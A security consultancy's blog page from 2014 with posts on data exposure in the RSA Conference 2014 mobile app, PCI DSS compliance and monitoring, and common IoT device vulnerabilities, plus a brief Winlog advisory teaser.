ADVISORIES | March 18, 2014

Sielco Sistemi Winlog Multiple Vulnerabilities

This advisory is a follow-up to the alerts titled “ICS-ALERT-12-166-01 Sielco Sistemi Winlog Buffer Overflow” that was published June 14, 2012, and “ICS-ALERT-12-179-01 Sielco Sistemi Winlog Multiple Vulnerabilities” that was published June 27, 2012, on the ICS-CERT web page. (more…)

INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It’s been half a decade since Apple launched their iPhone campaign titled “There’s an app for that“. In the years following, the mobile app stores (from all the major players) have continued to blossom to the point that not only are there several thousand apps that help light your way (i.e. by keeping the flash running bright), but every company, cause, group, or notable event is expected to publish their own mobile application. 
 
Today there are several hundred good “rapid development” kits that allow any newbie to craft and release their own mobile application and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren’t the types products that their owners are expecting to make much (if any) money off of. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and setting up WordPress sites–let alone building a mobile app, many corporate marketing teams I’ve dealt with have not only drunk the “There’s an app for that” Kool-Aid, they appear to bath in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices and, at the top of the sacrificial pillar, data security and integrity continue to reign supreme.
 
A few weeks ago I noticed that, in the run up to the RSA USA 2014 conference, a new mobile application was conceived and thrust upon the Apple and Google app stores and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of “come see us at RSA” emails, or it was topical off the back of a recent blog on the state of mobile banking application security, or maybe both. I asked some of the IOActive consulting team who had a little bench-time between jobs to have a poke at freshly minted “RSA Conference 2014” mobile application. 
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn’t expecting the application to be particularly interesting–it’s not as if it was a transactional banking application etc.–but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as to not potentially embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically the highest impact vulnerability had to do with the app being vulnerable to man-in-the-middle attacks, where an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, then heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens-of-millions) to try phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information of every registered user of the application–including their name, surname, title, employer, and nationality.
 
 
 
I have no idea why the app developers chose to do that, but I’m pretty sure that the folks who downloaded and installed the application are unlikely to have thought that their details were being made public and published in this way. Marketers love this kind of information though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I’m betting that RSA didn’t even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it’s possible to get a list of all the other applications QuickMobile have created for what I would assume to be on their clients behalf.
 
 
 
As you can see from above, there are lots of popular brands and industry conferences employing their app creation services. I wonder if many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here’s a little bit of advice to any corporate marketing team. If you’re going to release your own mobile application, the security and integrity of that application are your responsibility. While you can’t outsource that, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications–unless you’re a hacker or marketing team that wants to acquire a free list of conference attendees names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, braking abruptly, and starting all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state, but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously with rare exceptions and not only during the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations it is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world’s best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices, not just opinions based on theories and real life experience.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common–most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs’ security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost the exact same vulnerabilities on these devices that have plagued software vendors over the last decade. Vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse is that sometimes vendors don’t even respond to security vulnerability reports or just downplay the threat and don’t fix the vulnerabilities. Many vendors don’t even know how to properly deal with the security vulnerabilities being reported.
 
Some of common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom made protocols
Also, data ambition is working against vendors and is increasing attack surfaces considerably. For example, all data collected is sent to “vendor cloud” and device commands are sent from “vendor cloud”, instead of just allowing users to connect directly to and command their devices. Hacking into “vendor cloud” = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We’ve only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn’t change soon, it is just matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users given that the best solution is just not to buy or use many products because they are insecure by design. At this stage, it’s just matter of being lucky and hoping that you won’t be hacked. Maybe opportunistic vendors could come up with some novel solution such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS–in a couple of days we will be releasing some of the extensive research I mentioned and on which this blog post is based.
 
I intend for this post to be a wakeup call for everyone! I’m really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn’t, then at least I have tried.